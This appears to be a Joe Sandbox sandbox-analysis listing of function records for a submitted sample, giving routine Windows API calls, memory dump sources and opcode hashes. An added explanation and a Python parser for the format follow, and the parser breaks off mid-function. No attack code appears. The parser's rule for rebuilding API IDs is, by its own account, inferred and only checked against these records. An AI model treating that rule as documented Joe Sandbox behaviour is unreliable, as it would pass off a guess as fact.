                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AttributesFile
                                • String ID:
                                • API String ID: 3188754299-0
                                • Opcode ID: 821d3f81cac55657c2cee26158d135caa0f3f73f3972ace0cb4929145ca368b0
                                • Instruction ID: 247ea3949b77df5b370d6aa09adceb134a1299b54f591ef051532c0f9b4a1946
                                • Opcode Fuzzy Hash: 821d3f81cac55657c2cee26158d135caa0f3f73f3972ace0cb4929145ca368b0
                                • Instruction Fuzzy Hash: DEF01C312402097BDF115EA5DC45BD9776CAB04385F488052BC8CD6261DB769EA8AA71
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: ItemText_swprintf
                                • String ID:
                                • API String ID: 3011073432-0
                                • Opcode ID: 0cad09f5fcbd4fcfcdbf8c024e3cfe8ce461d8c516383b7080408f6ca923cba5
                                • Instruction ID: e4883802f8a9a213ce3f1ebe408be7d723302a6458b0106332828f6b917e5ec8
                                • Opcode Fuzzy Hash: 0cad09f5fcbd4fcfcdbf8c024e3cfe8ce461d8c516383b7080408f6ca923cba5
                                • Instruction Fuzzy Hash: 61F05C319003483BDB11AB709C02FAD371EDB09745F040581B604971A1E9716E204771
                                APIs
                                • DeleteFileW.KERNELBASE(?,?,?,00D6984C,?,?,00D69688,?,?,?,?,00D91FA1,000000FF), ref: 00D6A13E
                                • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,00D6984C,?,?,00D69688,?,?,?,?,00D91FA1,000000FF), ref: 00D6A16C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: DeleteFile
                                • String ID:
                                • API String ID: 4033686569-0
                                • Opcode ID: 3e96efc4dc68cd4cc4006f6db166f917619be78babac38f23887257ac2b0af2e
                                • Instruction ID: f1b38bbb08a1dd635c15eb40c3dcbe62767ca091cd713b6d38a0bf08bc82b3b4
                                • Opcode Fuzzy Hash: 3e96efc4dc68cd4cc4006f6db166f917619be78babac38f23887257ac2b0af2e
                                • Instruction Fuzzy Hash: 8DE092356803086BDB119F64DC42FE9775CEB09382F484066B888D7160EB61DDD4AEB1
                                APIs
                                • GdiplusShutdown.GDIPLUS(?,?,?,?,00D91FA1,000000FF), ref: 00D7A3D1
                                • OleUninitialize.OLE32(?,?,?,?,00D91FA1,000000FF), ref: 00D7A3D6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: GdiplusShutdownUninitialize
                                • String ID:
                                • API String ID: 3856339756-0
                                • Opcode ID: 76904860264f2cef3b4dcb69ff46c0bf72b7e39619751e404ac8bcd7c129ee7a
                                • Instruction ID: 6399e01a51c9b98dd648859fef60a28210f072a25afb60a639a6ccd5b2b8ce13
                                • Opcode Fuzzy Hash: 76904860264f2cef3b4dcb69ff46c0bf72b7e39619751e404ac8bcd7c129ee7a
                                • Instruction Fuzzy Hash: FFF03932A18759EFC7109B4CDC05B19FBA9FB8AB20F04436AF419C3760CB786810CAA5
                                APIs
                                • GetFileAttributesW.KERNELBASE(?,?,?,00D6A189,?,00D676B2,?,?,?,?), ref: 00D6A1A5
                                • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00D6A189,?,00D676B2,?,?,?,?), ref: 00D6A1D1
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AttributesFile
                                • String ID:
                                • API String ID: 3188754299-0
                                • Opcode ID: b26bfc791873c0b8fc4051f5869deabefd6965765295988d0b8d3e3012835975
                                • Instruction ID: 4dfe254c48d2ba3aa2f13c2787643a26b6189cbba796470381bad6e3828b4603
                                • Opcode Fuzzy Hash: b26bfc791873c0b8fc4051f5869deabefd6965765295988d0b8d3e3012835975
                                • Instruction Fuzzy Hash: 97E09B359002185BCB10ABA8DC05BD5775CEB093E1F0441A2FD49E7290D7709D449AF1
                                APIs
                                • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D700A0
                                • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00D6EB86,Crypt32.dll,00000000,00D6EC0A,?,?,00D6EBEC,?,?,?), ref: 00D700C2
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: DirectoryLibraryLoadSystem
                                • String ID:
                                • API String ID: 1175261203-0
                                • Opcode ID: f0ad97b6a9fbdd2cb3afb8be669c191c7d7653690db1f5e15259db8270982436
                                • Instruction ID: 1b0c1185b7d5af296f382d2ba750f28481705fcbcd572c695e4ab776a78b4d4a
                                • Opcode Fuzzy Hash: f0ad97b6a9fbdd2cb3afb8be669c191c7d7653690db1f5e15259db8270982436
                                • Instruction Fuzzy Hash: DCE0127690125C6BDB219AA49C09FD7776CEF0D392F0440A7BA4CD3144EA749A948BB0
                                APIs
                                • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00D79B30
                                • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00D79B37
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: BitmapCreateFromGdipStream
                                • String ID:
                                • API String ID: 1918208029-0
                                • Opcode ID: da8dd3713c185dc73ef861a0086ae73744bb6b1657ee0415cc750eb8a0798155
                                • Instruction ID: 0d0d5dd5ed1ac18ea370282c45b02de57ebc0cb7a6bc9f8ab1ed06f42f020a4f
                                • Opcode Fuzzy Hash: da8dd3713c185dc73ef861a0086ae73744bb6b1657ee0415cc750eb8a0798155
                                • Instruction Fuzzy Hash: 54E0ED72901218EBCB10DF98D541A99B7ECEB09321F10C09BE89993301E671AE049BB5
                                APIs
                                  • Part of subcall function 00D8329A: try_get_function.LIBVCRUNTIME ref: 00D832AF
                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D8217A
                                • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00D82185
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                • String ID:
                                • API String ID: 806969131-0
                                • Opcode ID: 269618c7eaf2388814a30454c9b6246d9db3a3fe6fd6c3e139867d9eb3d540ff
                                • Instruction ID: ec2dee13527e13990df7c0ff5ab836e5062c19e99e18b53343e5371a1fc50c15
                                • Opcode Fuzzy Hash: 269618c7eaf2388814a30454c9b6246d9db3a3fe6fd6c3e139867d9eb3d540ff
                                • Instruction Fuzzy Hash: B9D022782043022C2C0837F02C8AAB82384DA72FB03F00B8AFB20CA0D2EF2080087331
                                APIs
                                • DloadLock.DELAYIMP ref: 00D7DC73
                                • DloadProtectSection.DELAYIMP ref: 00D7DC8F
                                  • Part of subcall function 00D7DE67: DloadObtainSection.DELAYIMP ref: 00D7DE77
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: Dload$Section$LockObtainProtect
                                • String ID:
                                • API String ID: 731663317-0
                                • Opcode ID: 5c371756dd61ea19360e4262f28e723550e9ca28b0b042c327b15b8bfc1012d6
                                • Instruction ID: 3e7f1c1096a48527a6ee09fa5f7cf838311e7a89817a3a20b11c53a10bf22d49
                                • Opcode Fuzzy Hash: 5c371756dd61ea19360e4262f28e723550e9ca28b0b042c327b15b8bfc1012d6
                                • Instruction Fuzzy Hash: 25D0C9701003428AC312AF149A86B1C3676FF08744FA88655F29DC72A9FBA944C0C635
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: ItemShowWindow
                                • String ID:
                                • API String ID: 3351165006-0
                                • Opcode ID: 0beb751d95162973293639325686029157afed27cada079c1b4f39cd92c37783
                                • Instruction ID: 21d06b82c98fd243a6d4ee7a605a2e8d45509b3b8c4b19974c80fdec23afa32a
                                • Opcode Fuzzy Hash: 0beb751d95162973293639325686029157afed27cada079c1b4f39cd92c37783
                                • Instruction Fuzzy Hash: 51C01272058302BECB010BB0DC09D3FBBA8EBA4312F09C908B2A5C0160C638C010DB21
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID:
                                • API String ID: 3519838083-0
                                • Opcode ID: 4c202bcbade5e87aeb48ab7860daa426269c7bf7a3a9ae2d3d9475e3743a2f12
                                • Instruction ID: fe5c9e0ca5489f0039b603f1cfe99da8bdce8075588eef2059864119069cbb63
                                • Opcode Fuzzy Hash: 4c202bcbade5e87aeb48ab7860daa426269c7bf7a3a9ae2d3d9475e3743a2f12
                                • Instruction Fuzzy Hash: 4AC19E38A042549FEF15CF68C895BAD7BA5EF0A304F1C40BAEC46DB286CB319944CB71
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID:
                                • API String ID: 3519838083-0
                                • Opcode ID: f313c7d7503d618a73ad7cfce952f63b904973046eccf3f91292536ce1184cb3
                                • Instruction ID: 2ed1e4407d0606d5a186c1b1f09ec9734c29da4312e7b90d9f498d4e51655817
                                • Opcode Fuzzy Hash: f313c7d7503d618a73ad7cfce952f63b904973046eccf3f91292536ce1184cb3
                                • Instruction Fuzzy Hash: 76719B71104B44AFDB25DB74CC51AEBB7E8EF14301F48496EE5AB47242DA32AA48CF31
                                APIs
                                • __EH_prolog.LIBCMT ref: 00D68384
                                  • Part of subcall function 00D61380: __EH_prolog.LIBCMT ref: 00D61385
                                  • Part of subcall function 00D61380: new.LIBCMT ref: 00D613FE
                                  • Part of subcall function 00D619A6: __EH_prolog.LIBCMT ref: 00D619AB
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID:
                                • API String ID: 3519838083-0
                                • Opcode ID: 398bcf02b1fbc9e09eecff41bf90a88c0191843217ad091a1cd375e9d5707ff2
                                • Instruction ID: b486a27623308d5a3f2c9d95ae3f4606e1075415c57a56ed6c5bf78038689969
                                • Opcode Fuzzy Hash: 398bcf02b1fbc9e09eecff41bf90a88c0191843217ad091a1cd375e9d5707ff2
                                • Instruction Fuzzy Hash: CA4192318406589BDB20DB60CC55BEA73B9EF54300F0841EAE58AA7093DF756AC8EF70
                                APIs
                                • __EH_prolog.LIBCMT ref: 00D61E05
                                  • Part of subcall function 00D63B3D: __EH_prolog.LIBCMT ref: 00D63B42
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID:
                                • API String ID: 3519838083-0
                                • Opcode ID: c641fc4cdfdcaae35a014210faac14998e41ae6ef6f1076cf37a17446a103f6d
                                • Instruction ID: 23f23f6f42cf2ad187efe297977900fdcc1c4032202b419aee3f9a9f113fe8db
                                • Opcode Fuzzy Hash: c641fc4cdfdcaae35a014210faac14998e41ae6ef6f1076cf37a17446a103f6d
                                • Instruction Fuzzy Hash: D52148759041089FCB11EF99D9419EEFBF5FF58300B1441AEE849A3252DB325E14CB70
                                APIs
                                • __EH_prolog.LIBCMT ref: 00D7A7C8
                                  • Part of subcall function 00D61380: __EH_prolog.LIBCMT ref: 00D61385
                                  • Part of subcall function 00D61380: new.LIBCMT ref: 00D613FE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID:
                                • API String ID: 3519838083-0
                                • Opcode ID: f9178aa2ac5476f91a88ad60782aa97c44da243ef9c68b4ec862d21bb651ef81
                                • Instruction ID: 08e32d68984b7646a2baae82b111a1a950a9aecc8e12b59f97cf6463b5543aa0
                                • Opcode Fuzzy Hash: f9178aa2ac5476f91a88ad60782aa97c44da243ef9c68b4ec862d21bb651ef81
                                • Instruction Fuzzy Hash: E9216B75C04259ABCF14DF98C9429EEB7B4EF59304F0444EEE809A7202EB356E06DB71
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID:
                                • API String ID: 3519838083-0
                                • Opcode ID: 4374aee3adfd7ee97b948a539c0fd25cf132c4896cb4fd0c12f1c1c9a0a52735
                                • Instruction ID: aed58e4984e558f14855a02c308467d490c89fca8c12015dc3cb50c756c0a34e
                                • Opcode Fuzzy Hash: 4374aee3adfd7ee97b948a539c0fd25cf132c4896cb4fd0c12f1c1c9a0a52735
                                • Instruction Fuzzy Hash: F8116173E505289BCF22AFA8CC519EEF73AEF48750F054115F805B7361DA358D1186B0
                                APIs
                                  • Part of subcall function 00D885A9: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00D88FD3,00000001,00000364,?,00D83713,00000050,?,00DA0EE8,00000200), ref: 00D885EA
                                • _free.LIBCMT ref: 00D8BBF6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AllocateHeap_free
                                • String ID:
                                • API String ID: 614378929-0
                                • Opcode ID: aa7cfc08f8c271ce16935b528c62ef837d81ae20f42aba82ac1fb9d51323eae8
                                • Instruction ID: 69a550a12af0d5a1ebd9f1f4370c9cdc1894a85685c7f8dfa61af1334bef041e
                                • Opcode Fuzzy Hash: aa7cfc08f8c271ce16935b528c62ef837d81ae20f42aba82ac1fb9d51323eae8
                                • Instruction Fuzzy Hash: 9C01F9732003496BE3319F69D88595AFBE9FB85370F29056EE594832C0EB30B805C774
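The records above are machine-generated and easier to pivot on once parsed. The following is an added example, not Joe Sandbox code and not part of this report: a parser for the record format on this page (the `APIs`, `Memory Dump Source` and `Similarity` blocks) that extracts the call sequence per function, strips the "Download File" link text fused onto the dump names, pulls string arguments out of the call traces (the `Crypt32.dll` passed to `LoadLibraryW` right after `GetSystemDirectoryW`, which is consistent with the function building a full system-directory path before loading the DLL; that reading is an inference), and reconstructs the `API ID` field. The sample input is constructed from four records on this page. The reconstruction rule (CamelCase tokens, a small stop-list such as `Get`/`Rtl`/`W`, grouping by occurrence count joined with `$`) is inferred from those records and is an assumption, not a documented Joe Sandbox algorithm; it is checked only against the records included here.

```python
"""Parser for the Joe Sandbox function-record format used on this page.

Added example, not Joe Sandbox code. The API-ID reconstruction (stop-list,
frequency grouping) is inferred from this page's records and is an assumption.
"""
import re
from collections import Counter

# Constructed sample: four records copied from the report, residue included.
SAMPLE = """\
APIs
• GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D700A0
• LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00D6EB86,Crypt32.dll,00000000,00D6EC0A,?,?,00D6EBEC,?,?,?), ref: 00D700C2
Memory Dump Source
• Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
• Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• API ID: DirectoryLibraryLoadSystem
• String ID:
APIs
• DloadLock.DELAYIMP ref: 00D7DC73
• DloadProtectSection.DELAYIMP ref: 00D7DC8F
  • Part of subcall function 00D7DE67: DloadObtainSection.DELAYIMP ref: 00D7DE77
Similarity
• API ID: Dload$Section$LockObtainProtect
APIs
  • Part of subcall function 00D885A9: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00D88FD3,00000001,00000364,?,00D83713,00000050,?,00DA0EE8,00000200), ref: 00D885EA
• _free.LIBCMT ref: 00D8BBF6
Similarity
• API ID: AllocateHeap_free
APIs
• GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00D79B30
• GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00D79B37
Similarity
• API ID: BitmapCreateFromGdipStream
"""

# "• Name.MODULE(args), ref: ADDR", optionally after "Part of subcall function X:"
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?(?P<api>\w+)\."
    r"(?P<mod>[A-Z0-9_]+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$")
KV_RE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*?)\s*$")
RESIDUE_RE = re.compile(r"Download File$")  # link text fused onto dump names
HEX_RE = re.compile(r"[0-9A-F]{8}")  # a raw 32-bit argument as the report logs it
TOKEN_RE = re.compile(r"_[a-z_]+|[A-Z][a-z]+|[A-Z]+(?![a-z])")  # CamelCase split
STOP = {"Get", "Set", "Rtl", "Ole", "A", "W", "ICM"}  # assumed prefix/suffix drops


def parse_records(text):
    """Split the listing at each 'APIs' header; return one dict per function."""
    records, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
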